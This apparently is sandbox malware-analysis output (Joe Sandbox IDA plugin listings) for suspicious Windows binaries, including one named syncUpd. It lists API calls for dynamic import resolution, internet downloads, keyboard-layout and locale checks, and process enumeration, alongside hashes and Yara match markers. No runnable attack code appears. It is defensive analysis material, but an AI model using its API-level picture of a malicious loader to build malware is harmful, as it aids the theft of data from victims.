                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                                                                              • String ID: 4A
                                                                                                                                                                                                                                                              • API String ID: 123533781-205151761
                                                                                                                                                                                                                                                              • Opcode ID: 10de25d8ecb2cfa1bc608fb580c8efec0e2da14782617b487f323b55011567ea
                                                                                                                                                                                                                                                              • Instruction ID: 22ce08af28769af05eb0cd5aa661ce890bc21c05394b45439246242d1ad86c6a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10de25d8ecb2cfa1bc608fb580c8efec0e2da14782617b487f323b55011567ea
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC614DB0A087109FD710EF69C9886AABBF4FF88314F008AADE588D7391D7749885CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00406ED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsWindowVisible.USER32 ref: 00406F16
                                                                                                                                                                                                                                                              • CallWindowProcA.USER32 ref: 00406FB8
                                                                                                                                                                                                                                                                • Part of subcall function 00404BD7: SendMessageA.USER32 ref: 00404C00
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                              • Opcode ID: fef611bbe469a29a19d67650dfd37103651c2d078b1ca09239947b2c1c1f8b3b
                                                                                                                                                                                                                                                              • Instruction ID: 9710050d3cc87503a6e3ad62db4a5623da0bea7fc0aec59e94b28eb5e14ff036
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fef611bbe469a29a19d67650dfd37103651c2d078b1ca09239947b2c1c1f8b3b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F212CB0908315AFE710AF15E88496FBBF8EF44718F51883EF895A7281C3795851CB6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00404C0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42comCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • OleInitialize.OLE32(006C5640), ref: 00404C28
                                                                                                                                                                                                                                                                • Part of subcall function 00404BD7: SendMessageA.USER32 ref: 00404C00
                                                                                                                                                                                                                                                              • OleUninitialize.OLE32(00000000,00000000,?,?,0040651F), ref: 00404C82
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                                                                                                              • String ID: ,Xl
                                                                                                                                                                                                                                                              • API String ID: 2896919175-4168129721
                                                                                                                                                                                                                                                              • Opcode ID: 901f57252d099bfa9d9e74ad079356c761b3a8393354d98560504c99516854b1
                                                                                                                                                                                                                                                              • Instruction ID: 75bd5999431369d77bbf521c9437c267996017c7344dffd01c2583dab3973ae7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 901f57252d099bfa9d9e74ad079356c761b3a8393354d98560504c99516854b1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA01D4F150C200AFE350AF69D844B66BBFCEB84310F41847EEBC5A3390DB38A44187A9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674libraryloaderCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095C0B8), ref: 0041625D
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BF98), ref: 00416275
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D6B8), ref: 0041628E
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D7C0), ref: 004162A6
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D808), ref: 004162BE
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D928), ref: 004162D7
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00960180), ref: 004162EF
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D940), ref: 00416307
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D8F8), ref: 00416320
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D958), ref: 00416338
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D910), ref: 00416350
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095C0F8), ref: 00416369
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BE98), ref: 00416381
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BF18), ref: 00416399
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BFF8), ref: 004163B2
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D898), ref: 004163CA
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D8B0), ref: 004163E2
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,009601A8), ref: 004163FB
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BFD8), ref: 00416413
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D8C8), ref: 0041642B
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095D8E0), ref: 00416444
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963EF0), ref: 0041645C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963FE0), ref: 00416474
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BF38), ref: 0041648D
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963F08), ref: 004164A5
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,009640A0), ref: 004164BD
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00964148), ref: 004164D6
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00964010), ref: 004164EE
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00964130), ref: 00416506
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963ED8), ref: 0041651F
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963F68), ref: 00416537
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963F98), ref: 0041654F
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,009641A8), ref: 00416568
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095FDF0), ref: 00416580
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963FF8), ref: 00416598
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963FC8), ref: 004165B1
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BF58), ref: 004165C9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963F38), ref: 004165E1
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BF78), ref: 004165FA
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00964058), ref: 00416612
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,00963FB0), ref: 0041662A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095BFB8), ref: 00416643
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75900000,0095C338), ref: 0041665B
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00964160,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00964028,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00964088,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00964040,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00964070,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(009640B8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(009640D0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00964190,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75FD0000,0095C198), ref: 0041670A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75FD0000,009640E8), ref: 00416722
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75FD0000,0095DA60), ref: 0041673A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75FD0000,00964100), ref: 00416753
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75FD0000,0095C498), ref: 0041676B
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,00960450), ref: 00416790
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,0095C1D8), ref: 004167A9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,009600B8), ref: 004167C1
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,00963F20), ref: 004167D9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,00963F50), ref: 004167F2
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,0095C138), ref: 0041680A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,0095C458), ref: 00416822
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(734B0000,00964118), ref: 0041683B
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(763B0000,0095C1F8), ref: 0041685C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(763B0000,0095C218), ref: 00416874
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(763B0000,00964178), ref: 0041688D
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(763B0000,009641C0), ref: 004168A5
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(763B0000,0095C158), ref: 004168BD
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(750F0000,00960338), ref: 004168E3
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(750F0000,00960400), ref: 004168FB
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(750F0000,00963F80), ref: 00416913
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(750F0000,0095C178), ref: 0041692C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(750F0000,0095C1B8), ref: 00416944
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(750F0000,00960478), ref: 0041695C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,00964238), ref: 00416982
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,0095C238), ref: 0041699A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,0095DA90), ref: 004169B2
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,00964298), ref: 004169CB
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,00964268), ref: 004169E3
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,0095C258), ref: 004169FB
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,0095C4B8), ref: 00416A14
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,009641F0), ref: 00416A2C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A50000,00964208), ref: 00416A44
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75070000,0095C378), ref: 00416A66
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75070000,00964220), ref: 00416A7E
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75070000,009641D8), ref: 00416A96
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75070000,00964280), ref: 00416AAF
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75070000,00964250), ref: 00416AC7
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74E50000,0095C3D8), ref: 00416AE8
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74E50000,0095C278), ref: 00416B01
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75320000,0095C2B8), ref: 00416B22
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75320000,009645C8), ref: 00416B3A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,0095C298), ref: 00416B60
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,0095C118), ref: 00416B78
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,0095C2F8), ref: 00416B90
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,009644F0), ref: 00416BA9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,0095C478), ref: 00416BC1
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,0095C2D8), ref: 00416BD9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,0095C318), ref: 00416BF2
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F080000,0095C358), ref: 00416C0A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74E00000,00964568), ref: 00416C2B
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74E00000,0095DB90), ref: 00416C44
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74E00000,00964460), ref: 00416C5C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74E00000,00964448), ref: 00416C74
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DF0000,0095C398), ref: 00416C96
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6BBA0000,009642E0), ref: 00416CB7
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6BBA0000,0095C3F8), ref: 00416CCF
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6BBA0000,00964418), ref: 00416CE8
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6BBA0000,00964430), ref: 00416D00
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2238633743-0
                                                                                                                                                                                                                                                              • Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                                                              • Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82networkmemoryfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
                                                                                                                                                                                                                                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(c.A), ref: 00404D75
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00404D82
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                                                                                                                                                                                                                              • String ID: c.A$c.A
                                                                                                                                                                                                                                                              • API String ID: 3066467675-270182787
                                                                                                                                                                                                                                                              • Opcode ID: 21ffeaf44af740467b60e4b38cee9b12b10b5415320c04897876a6aa98f721d2
                                                                                                                                                                                                                                                              • Instruction ID: 9bb24127ce30fb55f1f06b14f783612db170e8ead3dba21b0de2cd79dcb36880
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21ffeaf44af740467b60e4b38cee9b12b10b5415320c04897876a6aa98f721d2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B73119F4A00218ABDB20DF54CD85BDDBBB5BB88304F5081D9B709A7280DB746AC58F9C
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                                                                                                              • String ID: /
                                                                                                                                                                                                                                                              • API String ID: 3090951853-4001269591
                                                                                                                                                                                                                                                              • Opcode ID: 6fb1a9b170aca6801ce35a247184ade1557fc4ba6a5157ca9a288a7fd699c6e8
                                                                                                                                                                                                                                                              • Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6fb1a9b170aca6801ce35a247184ade1557fc4ba6a5157ca9a288a7fd699c6e8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3491751439-0
                                                                                                                                                                                                                                                              • Opcode ID: 9ce118d042685daf90d7a6eff965731848e3dabe9ba4ff9ecad4140c240380c2
